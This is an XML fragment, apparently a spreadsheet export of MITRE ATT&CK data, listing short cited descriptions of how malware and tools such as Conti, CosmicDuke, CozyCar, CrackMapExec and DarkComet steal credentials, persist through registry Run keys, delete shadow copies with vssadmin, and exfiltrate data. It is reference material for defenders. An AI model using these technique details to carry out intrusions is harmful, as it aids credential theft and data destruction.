    <t>[Conti](https://attack.mitre.org/software/S0575) can use &lt;code&gt;CreateIoCompletionPort()&lt;/code&gt;, &lt;code&gt;PostQueuedCompletionStatus()&lt;/code&gt;, and &lt;code&gt;GetQueuedCompletionPort()&lt;/code&gt; to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. [Conti](https://attack.mitre.org/software/S0575) can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has decrypted its payload using a hardcoded AES-256 key.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has loaded an encrypted DLL into memory and then executes it.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can discover files on a local system.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can delete Windows Volume Shadow Copies using &lt;code&gt;vssadmin&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) has used API calls during execution.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate remote open SMB network shares using &lt;code&gt;NetShareEnum()&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has encrypted DLLs and used obfuscation to hide Windows API calls.(Citation: CarbonBlack Conti July 2020)(Citation: Cybereason Conti Jan 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate through all open processes to search for any that have the string “sql” in their process name.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of &lt;code&gt;net stop&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can retrieve the ARP cache from the local system by using the &lt;code&gt;GetIpNetTable()&lt;/code&gt; API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate routine network connections from a compromised host.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can spread itself by infecting other remote machines via network shared drives.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can utilize command line options to allow an attacker control over how it scans and encrypts files.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used the &lt;code&gt;curl --upload-file&lt;/code&gt; command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with "wallet" in their name using &lt;code&gt;find&lt;/code&gt;.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) </t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user’s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files automatically over FTP to remote servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) copies and exfiltrates the clipboard contents every 30 seconds.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including Web browsers.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from local hard drives with file extensions that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from network shared drives with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from removable media with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches attached and mounted drives for file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses a keylogger.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects LSA secrets.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses scheduled tasks typically named "Watchmon Service" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) takes periodic screenshots and exfiltrates them.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects Windows account hashes.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) contains a custom version of the RC4 algorithm that includes a programming error.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses Windows services typically named "javamtsup" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) has executed [Mimikatz](https://attack.mitre.org/software/S0002) to harvest stored credentials from the victim and further victim penetration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The payload of [CozyCar](https://attack.mitre.org/software/S0046) is encrypted with simple XOR with a rotating key. The [CozyCar](https://attack.mitre.org/software/S0046) configuration file has been encrypted with RC4 keys.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main [CozyCar](https://attack.mitre.org/software/S0046) component.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a scheduled task.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Password stealer and NTLM stealer modules in [CozyCar](https://attack.mitre.org/software/S0046) harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The main [CozyCar](https://attack.mitre.org/software/S0046) dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A system info module in [CozyCar](https://attack.mitre.org/software/S0046) gathers information on the victim host’s configuration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Some versions of [CozyCar](https://attack.mitre.org/software/S0046) will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046)'s main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A module in [CozyCar](https://attack.mitre.org/software/S0046) allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a Windows service.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>At (Windows)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to steal credentials from Web browsers on the victim machine.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to collect data from removable drives.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to retrieve files from its C2 server.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect and exfiltrate emails from Outlook.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) uses a custom TCP protocol for C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to list processes.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to perform screen captures.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect information about anti-virus software on the victim.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim PC name and operating system.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim MAC address and LAN IP.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) can list all files on a system.</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) creates a Launch Agent on macOS.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) uses run keys for persistence on Windows</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is capable of taking screen captures.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can automatically monitor removable drives in a loop and copy interesting files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has automatically exfiltrated stolen files to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can use Dropbox to receive commands and upload stolen data.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate files from compromised systems.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor removable drives and exfiltrate files matching a given extension list.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate data over the primary C2 channel (Dropbox HTTP API).(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used a hardcoded GitHub repository as a fallback channel.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has staged stolen files in the &lt;code&gt;C:\AMD\Temp&lt;/code&gt; directory.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has established persistence with a scheduled task impersonating the Outlook item finder.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor for removable drives being plugged into the compromised machine.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has the ability to persist using scheduled tasks.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability to send and receive files.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) decodes an embedded configuration using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) lists files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can capture microphone data from the victim's machine.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can download and execute additional payloads.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of logging keystrokes.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is encrypted using single-byte XOR.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of capturing screenshots of the victim's machine.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can download its payload from a C2 server.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can listen in to victims' conversations through the system’s microphone.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can steal data from the clipboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can execute various types of scripts on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like the Windows Firewall.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can load any files onto the infected machine to execute.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has a keylogging capability.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds a Registry value for its installation routine to the Registry Key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”&lt;/code&gt; and &lt;code&gt;HKEY_CURRENT_USER\Software\DC3_FEXEC&lt;/code&gt;.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can list active processes running on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds several Registry entries to enable automatic execution at every system startup.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can open an active screen of the victim’s machine and take control of the mouse and keyboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has the option to compress its payload using UPX or MPRESS.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can collect the computer name, RAM used, and operating system version from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) gathers the username from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can access the victim’s webcam to take pictures.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can launch a remote shell to execute commands on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Some [Daserf](https://attack.mitre.org/software/S0187) samples were signed with a stolen digital certificate.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Analysis of [Daserf](https://attack.mitre.org/software/S0187) has shown that it regularly undergoes technical improvements to evade anti-virus detection.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can download remote files.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
